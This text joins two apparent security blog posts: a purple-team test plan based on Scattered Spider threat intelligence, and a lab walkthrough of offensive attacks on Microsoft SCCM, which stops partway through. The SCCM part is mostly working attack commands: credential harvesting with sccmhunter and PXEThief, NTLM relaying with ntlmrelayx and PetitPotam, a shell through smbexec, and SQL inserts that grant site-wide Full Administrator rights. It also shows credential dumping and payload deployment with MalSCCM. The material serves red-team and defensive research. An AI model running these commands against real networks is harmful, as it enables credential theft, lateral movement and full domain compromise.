FS-ISAC released an advisory in 2023, which detailed a range of social engineering vectors, which would link with Co-Op’s recommendation for all staff to have cameras on in meetings; a likely sign that vishing or impersonation was a direct tactic used in 2025. The report lists a range of TTPs:

  • Gather Victim Identity Information: Credentials (T1589.001)
  • Phishing: Spearphishing Voice (T1566.004)
    • Specifically targeting the IT Helpdesk
  • Multi-Factor Authentication Request Generation (T1621)
    • Otherwise known as MFA Bombing or MFA Fatigue
  • (SMS) Phishing (T1660)
  • SIM Card Swap (T1451)
  • Acquire Infrastructure: Domains (T1583.001)
  • Account Manipulation: Device Registration (T1098.005)

The report also lists Bring-Your-Own Vulnerable Driver (BYOVD) as a TTP, which could be considered for testing, or ensuring that BYOVD-specific controls are enabled, such as the corresponding ASR rule in MDE.

Google/Mandiant

A recent Mandiant report lists a range of TTPs which mirror the above, with a handy diagram (below) which shows a graphical mapping of the TTPs across the attack chain.

Source: https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications

Some of the notable TTPs are:

  • (SMS) Phishing (T1660)
  • SIM Card Swap (T1451)
  • Phishing: Spearphishing Voice (T1566.004)
    • Specifically targeting the IT Helpdesk
  • Remote Access Tools: Remote Desktop Software (T1219.002)

Notably there are a lot of other lower-skilled TTPs listed here, such as using Mimikatz and secretsdump.py, which should be readily detected by any EDR.

CISA

In 2023, CISA produced a report on Scattered Spider activity with the following TTPs:

  • (SMS) Phishing (T1660)
  • SIM Card Swap (T1451)
  • Phishing: Spearphishing Voice (T1566.004)
    • Specifically targeting the IT Helpdesk
  • Remote Access Tools: Remote Desktop Software (T1219.002)
    • Noted tools included Pulseway, ScreenConnect, TeamViewer.
  • Multi-Factor Authentication Request Generation (T1621)

Following a successful vish or phish of a user, Scattered Spider were observed to then perform more detailed OSINT into the targets, looking to identify potential answers to their security questions or perform targeted SIM swapping attacks.

Other

Scattered Spider has also been observed to register domains using the *.it.com domain, along with various domains relating to potential targets, such as corp-TARGET_HERE.com, which is also noted by CISA.

Testing Approach

From the above threat intelligence, it is clear to see several common approaches taken by Scattered Spider, specifically around vishing and the widespread use of social engineering tactics. To assess this, there are several different attacks which can be simulated through either a red or purple team exercise.

Vishing

The main TTP used by Scattered Spider appears to be the use of vishing to gain access to their targets. As part of this, the following could be tested:

  • Vishing the IT Support helpdesk to gain a password and/or MFA reset
    • This should include both a ‘standard’ and ‘privileged’ user as targets
  • Assess controls in place on video calling and internal messaging applications
    • Can an external Teams user directly message/call employees?
    • Are external tenants only to communicate internally following approval?
  • Can the SOC correlate the activity from an IT Helpdesk call to any malicious behaviour (I.e. MFA Methods added or unusual account activity)
  • Perform vishing attacks directly against high-profile or privileged users
    • Currently this is not listed by any public TI sources, but would be a logical next step for Scattered Spider TTPs
    • This would have to be carefully planned with considered guardrails and limitations to prevent causing harm or distress to any users.

Performing internal vishing (E.g. social engineering a user from the position of another internal user) can be challenging during a purple team exercise, due to the lack of technical controls which can be implemented to prevent otherwise legitimate behaviour. Instead, this can be somewhat simulated by attempting some of the ‘Risky Sign In’ behaviour below. For example, by simulating the theft of valid credentials, and attempting to authenticate as a secondary account. This would simulate the stages before an internal vishing attack, as the attacker gains access to the internal environment.

Another approach could be to simulate a supply chain compromise, from the position of a IT provider/supplier being compromised. By configuring a separate (trusted) tenant, and then creating an account within it to simulate a third party user or contractor. This could be a privileged account, or simply a ‘standard’ account, which is within a tenant that has a level of trust into the main tenant. Several tests could then be performed from the trusted into the trusting tenant:

  • Performing vishing and phishing attacks
    • Such as sharing a link to a credential capture portal, sending various payloads via email or Teams
    • Throughout these TTPs, the behaviour of email and web filtering and gateway solutions should be checked for any discrepancies compared to the same behaviour performed from an ‘untrusted’ account.
  • Credential re-use onto SSO-enabled platforms such as Citrix, AVDs or other internal systems
  • Enumeration of shared cloud resources or internal data repositories

Credential Capture

Scattered Spider appear to make extensive use of credential capture sites, such as those created by Evilginx. These sites are often hosted using domains which mimic the brand being targeted, which could act as another point of detection. Some potential tests include:

  • Phishing using a credential capture lure
  • Sending credential capture payloads from a domain impersonating the target (e.g. auth-TARGET_NAME.com)
  • Assessing that alerts are raised following credential capture activity
  • Registering domains which impersonate the target to test brand protection controls and/or typo-squatting detections

This can also blur into testing ‘risky sign-in’ activity, such as performing signins from non-compliant hosts or those in unusual geographies. This can be performed by:

  • Using VPS’s in unusual geographies to simulate a foreign login
  • Testing ‘impossible travel’
  • Authenticating using an abnormal host or browser/user agent (E.g. Kali Linux, Firefox)
  • Authenticating following an MFA Fatigue attack (See later!)
  • Performing a secondary authentication whilst the user is legitimately signed in.

Credential Re-Use

Credential stuffing or re-use attacks appear to also be used by Scattered Spider, along with a number of other threat actors. Whilst this is a commonly used technique, there are several password spraying TTPs which are worth assessing:

  • Evaluate breached credentials and combolists for leaked credentials
    • Depending on the scope and appetite of the customer, performing more targeted OSINT into high profile or privileged users to identify passwords used on personal accounts could be performed – subject to approval!
  • Perform targeted password spraying using any leaked credentials, including potential modifications (E.g. London101! -> London102!)
  • Widespread password spraying using passwords relating to the company or industry

With access to a valid account, a wider range of tests can be simulated as an assumed compromise-style test to assess the post-authentication controls:

  • Attempt to add phone/SMS based MFA methods to an account
    • If they are, then perform MFA Fatigue tests against it.
  • Sign in using a non-compliant device
  • Attempt to perform typical early kill chain behaviour
    • Searching SharePoint/internal resources for passwords or internal data
    • Gathering of Teams and Outlook data
    • Add new MFA methods to the account
    • Change the password of the account
  • Follow the ‘Risky Sign In’ activity above
  • Evaluation of the current password policy and banned password phrases

Remote Management and Monitoring (RMM)

Attempting to download and install various RMM tools on a corporate device should be sufficient to raise alerts, especially if the executable is not being installed via an approved method (E.g. InTune). CISA has a specific advisory on this, which contains additional information.

For some (or all!) of the RMM software mentioned by RedCanary, you could:

  • Attempt to download the RMM software
  • Install the RMM software
  • Establish a remote connection to the host
  • Attempt to run various commands through a provided console (If it has one) or through cmd/powershell.

Alerts could be raised at all points of these tests, though this can be challenging due to the executables potentially being allowed by policy, for example of AnyConnect is a corporate solution for screensharing or client communications. It would also be a good exercise to ensure any actions performed via a RMM can be successfully attributed to a RMM session by the SOC/IR teams, rather than a more generic attribution to activity via a CLI.

Additional Considerations

Whilst the TI mentioned above lists a range of TTPs, it is also important to consider some of the emerging initial access tradecraft seen by other threat actors, such as Device Code phishing, ClickFix and Living Off Trusted Sites (LOTS). Whilst I dont believe this has been publicly observed as being used by Scattered Spider yet, given the success of such techniques it would be advised to ensure these are also tested, as the TTPs in use may evolve!

A lot of this post focuses on technical controls and testing, but this activity also has a number of potential table top scenarios which could be produced from it to ensure the correct processes are in place. For example:

  • How would a third-party compromise be handled in light of the recent breaches?
  • What would the process be for handling AiTM alerts being raised against a privileged IT account?
  • What would the response be if a mass password-spraying attack was observed from known Scattered Spider infrastructure?

Specific training or guidance for staff may be sensible given the uptick in active attacks from Scattered Spider recently. Training could focus on:

  • How to identify potential social engineering approaches, focusing on vishing specifically
  • How can users report suspicious internal messages or video calls
  • Raising awareness of current attacker trends, such as ClickFix

Recommendations

The FS-ISAC report and the Mandiant report have a range of recommendations on specific controls to be implemented, and would be a good starting point for any assurance activity.

Offensive SCCM Summary

This article aims to summarise the currently available tooling (August 2023), as well as the attack vectors which are present. My previous article covers the basics of SCCM and how to configure an SCCM lab from scratch.

In summary, I believe the SCCM attack surface is currently not especially well understood or covered by most red teams, outside of the tooling produced by a number of fantastic researchers (below). More organisations need to better understand this area, as I have noticed a number of parallels between SCCM now and ADCS in 2021. Undoubtedly SCCM will remain an area of interest for researchers, red teamers and attackers for some time to come!

This post is based almost entirely on work done by Chris Thompson (@_Mayyhem) and Garrett Foster (@garrfoster), I am simply joining the dots between several of their projects and tools – as well as work from several other researchers!

Tooling & Who To Follow

There is a lot of publicly released tooling to interact with SCCM:

In addition to these tools, there are a few great Twitter profiles to follow to remain up to date with the latest SCCM developments.

Lab Setup

For this, we will borrow the SCCM SnapLabs template from an0n_r0. On top of this, I will configure:

  • 2 Hosts
    • Win10 host (An ‘infected’ host), which will host our attacker tooling:
      • PXEThief
      • PowerSCCM
      • SharpSCCM
      • SCCMWTF
      • sccmhunter
    • Kali (In reality, this would be behind our C2 infra, but I want the lab to be nice and simple!). I will install:
      • Imapcket
      • Responder
  • 2 Users
    • SCCMLAB\da
      • Domain Administrator account, mostly to make my life easier when debugging
    • SCCMLAB\joe.bloggs
      • Our friendly infected user
      • Local admin rights on the Win10 device
  • A Task Sequence
    • Create a boot image, then a task sequence and set some dummy variables within it
  • Discovery Methods
    • Enabled AD Group Discovery on the Domain Computers group

The devices in the lab are as follows:

DeviceIP AddressName
Domain Controller10.10.0.100dc.sccmlab.local
SCCM Site Server10.10.0.101sccm.sccmlab.local
SCCM SQL Database10.10.0.102sccmsql.sccmlab.local
Server 110.10.0.151server1.sccmlab.local
Server 210.10.0.152server2.sccmlab.local
Kali (Attacker)10.10.0.161kali
Windows 10 Client10.10.0.241win10.sccmlab.local

We will use the joe.bloggs user extensively, who has a password set to a.

General Recommendations

There a LOT of recommendations for how to secure SCCM. Below is a list of recommendations which are collated from Gabriel Prud’homme‘s talk and SharpSCCM’s wiki.

  • Active Directory
    • General
      • Ensure that any accounts used by SCCM for deployment strictly follow least-privilege principles. This includes NAA, Client Push, Task Sequences and Collection Variables.
      • Check that Tier 0 assets are not being managed by SCCM
      • Ensure that any SCCM administrator accounts are being treated at the same level as the assets which they manage. I.e. An SCCM site managing all client devices should be be treated as a Tier 0 account.
      • Check for password re-use or weak passwords used by any of the accounts used by NAA, Client Push, Task Sequences and Collection Variables
      • Set ms-DS-MachineAccountQuota to 0
    • Network Access Accounts (NAA)
      • Dont use NAA’s if possible, use Enhanced HTTP instead – as recommended by Microsoft
      • Rotate passwords on NAA accounts if they are no longer used, as the credentials can still be cached.
      • If NAA has to be used, ensure the account has no special permission. It only needs to allow for domain connectivity
    • Client Push Accounts
      • Don’t use Client Push if possible, use ‘Software update-based installation’ instead
      • If Client Push has to be used:
        • Specify a Client Push account, to prevent the site computer account from performing Client Push installations.
        • Disable automatic site-wide Client Push installation.
  • PXE Hardening
  • Patching
    • Install the 2 KB’s KB15498768 and KB15599094
      • These prevent a number of the attacks (Such as Site Takeover via Client Push)
    • Enable SMB signing domain-wide (Prevent NTLM relay to SMB)
    • Require LDAP signing or channel binding on domain controllers (Prevent NTLM relay to LDAP)
    • Require Extended Protection on AD CS servers (Prevent relay to HTTP)
  • MSSQL Hardening
  • Site Servers
    • Ensure all unnecessary connections to site servers are blocked by firewalls to reduce likelihood of relaying attacks

SCCM Attack Paths

Before we delve into all of the attack paths, here is a summary of the potential attack paths we can exploit:

Chris Thompson & Diego Lomellini go into more depth on the various site takeover attacks in their SharpSCCM 2.0 talk, which includes the following slide at 4:55:

Throughout this I will use the Kali machine to refer to an attacker controlled machine, typically being used to listen for incoming NTLM authentication responses.

Network Access

To start with, we will assume that we just have network access and haven’t yet managed to compromise a user. Thankfully SCCM supports unattended deployments through technologies such as PXE. Unfortunately I was unable to get this working in my lab, so have been unable to replicate these attacks:

Recon – Find SCCM Infrastructure

As covered by Gabriel in his talk at BHIS, we can scan for specific open ports which might indicate that SCCM is running on the system.

SCCM ItemPortLink
Site Servers/Management Points8530,8531,10123 (All TCP)Link
Distribution Point49152-49159 (TCP)Link
PXE OSD4011 (UDP)Link

For example:

nmap -sT -p 8530,8531,10123 --open 10.10.0.0/24

Credential Access – Obtain PXE Media File

If PXE is used for for OS deployment, then we can use PXEThief to enumerate through the resources used. If the PXE process doesn’t require a password, then we can use pxethief.py 1 to automatically obtain the relevant images, and parse them for credentials. If it does use a password then we can use option 3 or 5 to try and decrypt the file, or crack the password to the file using Hashcat.

Credential Access – Obtain NAA Creds

Assuming we have access to the network, the network uses PXE for OS deployment and we know the password to start PXE deployment, then we can attempt to join a new machine to the network.

From Christopher Panayi’s talk at DefCon 30, we can press F8 repeatedly to get a SYSTEM shell, where we can then run a VBS script to dump out the environment variables, which can include the _SMSTSReserved1 and _SMSTSReserved2 variables, which are the creds for the NAA account.

Credential Access – Read unattend.xml

Again, assuming we have access to the network, and the network uses PXE deployment, we can attempt to join a new machine to the network.

From Christopher Panayi’s talk, if we wait until the OS installation has begun, we can look in the C:\Windows\panther\unattend\unattend.xml file to see if it contains credentials for domain-joining the new OS.

Standard User

If we assume we have just landed in an environment, there are a number of potential avenues of attack for us. As you can see below, we can now potentially perform some site takeover attacks – which could allow us to gain full permission over an SCCM site.

Recon – Identify Site Information

Using MalSCCM.exe locate, we can identify the site code and the server which is the management point for our current device. We can do the same with PowerSccm using the Find-LocalSccmInfo cmdlet, or directly query the local WMI interface via PowerShell with Get-WmiObject -Class SMS_Authority -Namespace root\CCM

MalSCCM.exe locate

Or we can do this by searching for ‘Configuration Manager’ in the control panel.

We can use SCCMHunter with the find command to query LDAP for details on any AD objects.

python sccmhunter.py find -d sccmlab.local -dc-ip 10.10.0.100 -u joe.bloggs -p a

Finally, we can hunt in information repositories for some terms which are linked to SCCM:

  • ccm_system
  • ccm_system_windowsauth
  • sccm
  • mecm
  • AdminService/v1.0

Enumeration – Logs

We can also look through the SCCM logs within C:\Windows\CCM using SharpSCCM with the following command

SharpSCCM.exe local triage

Enumeration – Previously Executed Scripts

From a Primary Site, we can run PowerShell scripts on remote devices. These scripts are stored on the client within the %windir%\CCM\ScriptStore folder, but require admin access to read them.

Luckily for us, these scripts can be PowerShell scripts, which will be logged within the PowerShell logs of any client which it is run on. If PowerShell logging is enabled. We can retrieve the contents of the script by searching through the event logs, using the command below we can look for a password:

Get-WinEvent -ProviderName Microsoft-Windows-PowerShell | Where-Object { $_.Message -like "*password = *" } | Format-List -Property Message

Recon – Enumerate SiteStore Scripts

Scripts run by the ‘Run Script’ command will be logged if certain (common) criteria are met. These scripts are stored on the remote devices within C:\Windows\CCM\ScriptStore. If we have admin access to the device, then we dont need to rely on PowerShell logging to be enabled, as we can read them from the device itself.

The scripts are protected so that only the SYSTEM user is able to read them. We can spawn a SYSTEM shell using PSExec -s -i cmd.exe and read the contents of the file.

Enumeration – SCCMContentLib

Thanks to 1njected’s CMLoot repo, we can investigate files stored within the hidden SCCMContentLib$ share on Distribution Points. As mentioned in their blog post for WithSecure, the file structure for this share is frustrating to parse through, and it can be quite difficult to correctly secure files in this share.

. \CMLoot.ps1
Invoke-CMLootInventory -SCCMHost sccm.sccmlab.local -OutFile "C:\Excluded\cmloot_out.txt"

Enumeration – PXEBoot Shares

Using SCCMHunter with the smb option, we can take the results of its find command, and probe each result for SMB shares titled REMINST, which indicate the usage of PXEBoot. PXEBoot can then be exploited with PXEThief to obtain boot images for any devices which are connected to the network – these images can contain domain credentials.

python sccmhunter.py smb -d sccmlab.local -dc-ip 10.10.0.100 -u joe.bloggs -p a

We can then navigate to \\sccm.sccmlab.local in the File Explorer. Notice the REMINST folder in the top right below.

The REMINST/SMSTemp folder can contain *.var files, which can be decrypted to reveal sensitive values. To decrypt any identified files, we can use PXEThief in mode 3, else we can use mode 5 to get the hash of the file. We can decrypt this using Christopher Panyai’s custom hashcat module using mode 19850. After cracking we can then run PXEThief again using mode 3, to decrypt the file. Gabriel’s talk at BHIS includes a demo on how to perform this.

Credential Access – NAA

ms-DS-MachineAccountQuota > 0

The easiest way of obtaining NAA credentials relies on the domain having a ms-DS-MachineAccountQuota value greater than 0, or some way of obtaining machine account passwords. To perform this attack, we will use sccmhunter with the http module, which will create a computer object via the MachineAccountQuota misconfiguration, when using the -auto option. It will then attempt to obtain NAA creds, writing them to the loot folder if successful.

python sccmhunter.py http -d sccmlab.local -dc-ip 10.10.0.100 -u joe.bloggs -p a -auto

We can read out the loot/sccm_naapolicy.xml file, which is just XML data, which then contains a blob of encoded data to secure the NAA, within the NetworkAccessUsername and NetworkAccessPassword fields.

We then need to decrypt these credentials, which we can do with the policysecretunobfuscate.c file from XPN’s sccmwtf project.

Under the hood, sccmhunter http is using the sccmwtf project (to spoof machine enrolment) along with addcomputer.py (To get computer account credentials). XPN’s blog post on the subject is well worth a read though, as it delves into the crypto behind this process.

ms-DS-MachineAccountQuota = 0

(Updated 5/12/23) Ralph Desmangles added functionality to sccmhunter, which will pull the NAA credentials from DPAPI, avoiding the need to perform NTLM relaying. We need to provide domain credentials and the server we want to target. In this case, we have local admin rights on our device so we will set the target to 10.0.1.6, which is the IP address for our win10 machine.

sccmhunter.py dpapi -u joe.bloggs -p a -target 10.0.1.6

This is mentioned in the SpecterOps post about NAA’s, which refers to the location within WMI. We can confirm this without using sccmhunter and instead using a admin PowerShell session with the following command:

Get-WmiObject -namespace “root\ccm\policy\Machine\ActualConfig” -class “CCM_NetworkAccessAccount”

If we want to avoid using DPAPI for some reason, then thanks to Gabriel Prudhomme’s (@vendetce) talk, we can perform this via coercing authentication (e.g. via PetitPotam).

We can use a modified version of Impacket by Tw1sm to relay NTLM auth and obtain NAA credentials. When copying this, make sure to grab the feature/sccm-relay branch – the master branch doesn’t include the updated version of ntlmrelayx. Also make sure you are using virtual environments in Python here, as this version of Impacket is quite far behind the latest release, so it is liable to not work as expected!

git clone -b feature/sccm-relay https://github.com/Tw1sm/impacket.git impacket-tw1sm

Lets stand up ntlmrelayx.

python3 ntlmrelayx.py -t http://sccm.sccmlab.local/ccm_system_windowsauth/request --sccm --sccm-device test12345 --sccm-fqdn sccm.sccmlab.local --sccm-sleep 10 -smb2support

Where --sccm-device is a random value which will represent the device name we will create (So should be random) and --sccm-sleep is a time given to allow things to process. The IP chosen for PetitPotam doesn’t matter, it just needs to be a machine in the domain. This will create fake devices in SCCM, so will require cleaning up after exploitation!

We can now coerce authentication, where 10.10.0.161 is the IP address hosting ntlmrelayx and server1.sccmlab.local is the target to coerce authentication from.

python3 petitpotam.py 10.10.0.161 server1.sccmlab.local -u joe.bloggs -p a -d sccmlab.local

And ntlmrelayx responds by obtaining NAA credentials!

This is the same file as described earlier, so we wont cover decryption here! More details on this attack are in XPN’s blog post on the subject.

I suspect this could also be abused by leveraging pre2k computer accounts, removing the need to perform relaying.

Credential Access – Client Push Account

We can trigger a client push and capture the hashes with Responder.

Note that we get both the machine account and the Client Push account. Password cracking can be attempted using mode 5600 in hashcat.

Another option covered by Christian’s talk at BHIS involves us ‘removing’ our device from SCCM, which will cause it to automatically try to re-enrol it back into SCCM. This does require us to escalate to SYSTEM permissions, and is quite noisy given we are renaming machines, disabling firewalls and so on. It also requires automatic client push and Allow connection fallback to NTLM to be enabled.

As detailed in his talk, this means that one of two accounts will then authenticate onto our machine:

  1. The SCCM Client Push account
  2. The machine account for the SCCM Site Server

From here, we can then obtain a NTLMv2 hash for one of those accounts. Given the complexity of this, we are likely better using the invoke client-push attack from SharpSCCM if we meet the criteria, as it only requires a low-priv user account.

Lateral Movement – Client Push Account

The premise of this attack is that we can abuse the Client Push account by coercing it to authenticate with our machine. We can then relay this authentication onto other devices to move laterally. The crux of this is that the Client Push account needs to have local admin on all clients to work – so we just need meet the criteria above (SMB signing disabled & not patched). This is from Gabriel’s talk at BHIS, which refers to a talk by Brandon Colley at BSides KC.

This does have a few pre-reqs.

  1. Requires SMB Signing to be disabled on our target – we can find this out with sccmhunter.py sccm.
  2. KB15599094 and KB15498768 to not be installed. If they are installed, then we might be able to do the SCCM Server Machine Account method below

Below is a diagram summarising the attack, ultimately step 4 can be whatever ‘action’ we want to take that leverages NTLM relaying. For example, this could be relaying to ADCS via ESC8.

We will start ntlmrelayx, targeting a server I know already exists (10.10.0.151). I will use the -socks flag so that we can leverage this captured NTLM authentication with a tool of our choice (by using proxychains).

python3 ntlmrelayx.py -t 10.10.0.151 -smb2support -socks

And then we can invoke the Client Push account to authenticate to our domain-joined machine with SharpSCCM , using its invoke client-push command. 10.10.0.161 is the IP address for our ntlmrelayx server.

SharpSCCM.exe invoke client-push -t 10.10.0.161 -mp sccm.sccmlab.local -sc S01

After a little wait, ntlmrelayx captures the incoming authentication.

We can run the socks command in ntlmrelayx to show the status of the captured sessions.

In this case, I will use smbexec.py to obtain a shell as a demo. Make sure your account (SCCMLAB/SCCMCLIENTPUSH) matches up with the account you captured in ntlmrelayx. Also check proxychains is set to 127.0.0.1:1080, as that is what impacket uses by default.

proxychains python3 smbexec.py SCCMLAB/SCCMCLIENTPUSH@10.10.0.151 -no-pass

Lateral Movement – Site Takeover

Via SQL

As described by Chris Thompson of SpecterOps, the computer account for the Primary Site server is required to be a local admin on the SQL server and Management Point computers. Chris describes this in far better detail than I will be able to, but in effect this means that we can coerce NTLM authentication from the Primary Site’s computer account and relay it onto the SQL Server which supports the SCCM site. From this point, you could then grant yourself the Full Administrator SCCM role using SQL commands – giving yourself full access to any system managed by the Site. Gabriel covers this at 1:22:54.

This does require Extended Protection to be disabled in MSSQL. If this is enabled, then we can always relay via SMB onto a Management Point or MSSQL servers, if SMB Signing is disabled. This process is semi-automated with sccmhunter using the mssql module.

In order to be able to execute SQL queries against the site’s SQL server, we will coerce authentication from the site server’s machine account and relay it to the mssql service on the SQL server. This attack works due to a requirement for the site server’s machine account to have local admin rights over the SQL server during the setup of SCCM. See the first image in Chris’s blog as proof.

In the diagram below, the ‘site takeover’ section is only steps 1-4, steps 5-9 detail the exploitation steps if a package is deployed via SharpSCCM (as shown later on).

To start, lets check if we have permission to run a command on server1.sccmlab.local. As expected, we don’t have permission.

Lets stand up ntlmrelayx to capture incoming NTLM authentication requests. We will use SOCKS mode to keep the connection open, which will allow us to use proxychains to run SQL queries against the DB (10.10.0.102).

python ntlmrelayx.py -smb2support -ip 10.10.0.161 -t mssql://10.10.0.102 -socks

When this is stood up, we can trigger a Client Push from our infected user account. Don’t forget to set the target (-t) to the IP address of our machine running ntlmrelayx!

SharpSCCM.exe invoke client-push -mp sccm.sccmlab.local -sc S01 -t 10.10.0.161

ntlmrelayx catches the incoming authentication, notice that SCCM$ manages to authenticate against the mssql service on the penultimate line.

Whilst keeping ntlmrelayx open, lets open another terminal and proxy our SQL queries through to the SQL server. Note that the account name is wrapped in quotes due to it containing a $ sign. We are also using -windows-auth. When we connect we can enter whatever we want for the password.

proxychains python3 mssqlclient.py "SCCMLAB/SCCM$"@10.10.0.102 -windows-auth

We will now run sccmhunter.py mssql to determine the SQL command to run. In this, we will set joe.bloggs to have SCCM admin rights on site S01 with the arguments -tu joe.bloggs -sc S01

python sccmhunter.py mssql -d sccmlab.local -dc-ip 10.10.0.100 -u joe.bloggs -p a -tu joe.bloggs -sc S01

Resulting in a few SQL statements being generated:

use CM_S01

INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (0x0105000000000005150000003B0AC320F4F69FBD8B3F26E644060000,'SCCMLAB\joe.bloggs',0,0,'','','','','S01');

SELECT AdminID,LogonName FROM RBAC_Admins;

Lets run the first set of commands, which will add joe.bloggs into the RBAC_Admins group. We can then prove we have set joe.bloggs to AdminID = 16777218 by running a SELECT query on the RBAC_Admins table

Lets add this into our sccmhunter command to get the final queries, to grant permissions onto the joe.bloggs account.

INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (16777218,'SMS0001R','SMS00ALL','29');

INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (16777218,'SMS0001R','SMS00001','1');

INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (16777218,'SMS0001R','SMS00004','1');

And we can confirm we have added our permissions in:

We can also confirm this by going to Administration -> Security -> Administrative Users within MCM.

Lets run our command again to execute calc.exe on server1.sccmlab.local, this time we have success!

Via AdminService API

Hot off the press!! Garrett Foster recently released a blog post detailing how we can leverage the AdminService API interface to also take over an SCCM site. AdminService API is used to perform SCCM administrative tasks, and is used by the admin and pivot modules in sccmhunter – which Garrett wrote.

Using their PR to impacket, we will run ntlmrelayx. We can obtain our user’s SID using SharpSCCM.exe local user-sid.

ntlmrelayx.py -t https://sccm.sccmlab.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname "SCCMLAB\joe.bloggs" --displayname "SCCMLAB\joe.bloggs" --objectsid  S-1-5-21-549653051-3181377268-3861266315-1604

We will again coerce authentication via Client Push, but we could use PetitPotam or another technique of your choosing.

SharpSCCM.exe invoke client-push -mp sccm.sccmlab.local -sc S01 -t 10.10.0.161

Unfortunately, this attack wouldn’t work for me as my SMS Provider is on the same server as the site server itself, they need to be separate for this attack to work, as shown by my Site’s information below:

This can also be done via pass-the-hash, for example if we can perform ADCS abuse against a user with privilege over the WMI interface. This will be merged into sccmhunter at some point in the future, but can currently be performed with smsadmin

Lateral Movement – NTLM Relay To Other SCCM Clients

If the Client Push account has not been defined in an SCCM environment, the machine account of the SCCM server will be used to push the SCCM client onto endpoints. Therefore, the SCCM site computer account will have local admin rights across the estate. This means that if:

  • We can coerce authentication from the push account (i.e. PetitPotam)
  • SMB Signing is disabled (i.e. we can relay)

Then we can relay this authentication onto any SCCM client and gain admin access to it. This should be possible even after the two patches (KB15599094 and KB15498768) are installed. Gabriel has a great demo of this in his talk at 1:19:07. Below we use an example of SMBExec, but this could be any tool which can be used with a relayed NTLM authentication & proxychains.

If we now trigger a client push with SharpSCCM, we only get an authentication request from the SCCM$ account, not the sccmclientpush account.

SharpSCCM.exe invoke client-push -mp sccm.sccmlab.local -sc S01 -t 10.10.0.161

Due to us having configured a Client Push account before, this attack wont work, due to the SCCM$ account not having local admin rights onto the SCCM managed devices. In another network which has never used a dedicated Client Push account, we would expect to see the computer account as a local admin below.

SQL DB Admin To Primary Site DB

Obtain SCCM User Creds

If we have admin access to the SQL DB which supports the Primary Site, we can read out the encrypted credentials to SCCM users, by reading the SC_UserAccount table. Thanks (Again) to XPN, we can use his PoC ‘sccmdecryptpoc.cs to decrypt the contents of the files, with his Twitter thread covering the process in more detail.

This requires admin access to the server containing the “Microsoft Systems Management Server” CSP for it to work. In practise I believe this means we need to perform the decryption on an SCCM site server – though this doesn’t stop us from obtaining the encrypted value!

Again, we will assume we can coerce authentication and relay it onto the SQL server, though this attack can equally be performed if we have access to the SQL database itself. Lets do our standard setup for ntlmrelayx.

python ntlmrelayx.py -smb2support -ip 10.10.0.161 -t mssql://10.10.0.102 -socks

And then coerce authentication using Client Push

SharpSCCM.exe invoke client-push -mp sccm.sccmlab.local -sc S01 -t 10.10.0.161

We can then run SQL commands on the SQL server using proxychains, like we did for the Site Takeover attacks.

proxychains python3 mssqlclient.py "SCCMLAB/SCCM$"@10.10.0.102 -windows-auth
USE CM_S01
SELECT UserName,Password FROM SC_UserAccount

We can then use XPNs SCCMDecryptPoc tool to decrypt this.

Alternatively, we can use Mimikatz to do this so long as we have a valid connectionstring to the DB. This can be done using the misc::sccm /connectionstring:XYZ command. This will come with the associated fun involved with using Mimikatz.

Dumping Task Sequences

We can dump Task Sequences to look for creds and other interesting stuff. Several tables (vSMS_TaskSequencePackage, vSMS_TaskSequencePackageEx and TS_TaskSequence) contain the Sequence column which contains the XML for the Task Sequence. We can find the details on the accounts with the following SQL query:

SELECT TS_ID, Name, Sequence FROM vSMS_TaskSequencePackage

Unfortunately, SCCM doesnt just give us the plaintext XML, with the rows showing the characteristic 0x38393133303030 value. We can decrypt this using DeObfuscateSecretString by Mayyhem, after we convert this from hexidecimal.

Whilst we are likely to have a faster route to domain compromise via a ‘Full Administrator’ SCCM user, Task Sequences might contain other credentials of interest, which arent AD-based. For example, credentials to cloud accounts.

Coerce NTLM Authentication

Thanks to a tweet by Mayyhem, we can use the sp_CP_GenerateCCRByName stored procedure to coerce the site client installation account to authenticate to the ADMIN$ share on a machine of our choosing. We can also specify an IP address rather than relying on SCCM-managed hosts.

USE CM_S01
GO

DECLARE @return_value int 

EXEC    @return_value = [dbo].[sp_CP_GenerateCCRByName] 
        @MachineNameList = N'10.10.0.161', 
        @SiteCode = N'S01', 
        @bForced = false, 
        @bForceReinstall = false

SELECT 'Return Value' = @return_value

GO

Primary Site Admin

With ‘Full Administrator’ access to a Primary Site, we can perform a number of powerful attacks against clients managed by the site. This is by design, as a primary site is a Tier 0 asset.

The most basic attack would be to create a group of users we want to target, then deploy an implant to all of their machines using the SCCM GUI. That is quite lame, so we will instead use commands we can execute from within a command line.

At this point, we will assume we have performed a site takeover attack (via AdminService API or SQL).

Recon – Perform Recon Queries

Using sccmhunter we can run recon commands using the AdminService API to gather data and avoid more noisy methods. For example, the admin and pivot methods allow for collection of various forms of recon data.

I encountered a unsupported hash type md4 error whilst running sccmhunter. As always the solution is found on StackOverflow – we need to update the requests-ntlm library with the following command:

python3 -m pip install -U requests-ntlm

To start with, lets run the admin module, with the following command:

python sccmhunter.py admin -ip 10.10.0.101 -u "SCCMLAB\joe.bloggs" -p "a" -debug

After collection, we are dropped into a CLI where we can run further queries on the data. We can use the help command to find out the available features.

For example, we can find details on all the applications:

Or all of the collections:

To take this to the next step, we can use the pivot module to run further commands. For now its a PoC within sccmhunter, but no doubt we will see this further developed in the future.

We can use the help command within the interface to see the commands available to us:

For example, targeting server2.sccmlab.local, which has a device ID of 16777220:

Lateral Movement – Deploy an application

There are several ways of doing this, for this example we will use MalSCCM. To perform this attack we will create a group of computer objects and then deploy a payload to them. We can create user groups, but due to MalSCCM having to guess the most likely computer object based on the user, it is safer to set the computers manually. Whilst using the tool from an ‘infected’ client device, I found I had to specify the SCCM server with each command to avoid any errors.

To create our group, we will run:

MalSCCM.exe group /create /groupname:1337TargetGroup /grouptype:device /server:sccm.sccmlab.local

We will then set our target device, I had to use all caps rather than using a FQDN for this to work. It is likely that this needs to match the name as shown in the MCM portal, which appears to be the hostname in uppercase.

MalSCCM.exe group /addhost /groupname:1337TargetGroup /host:SERVER1 /server:sccm.sccmlab.local

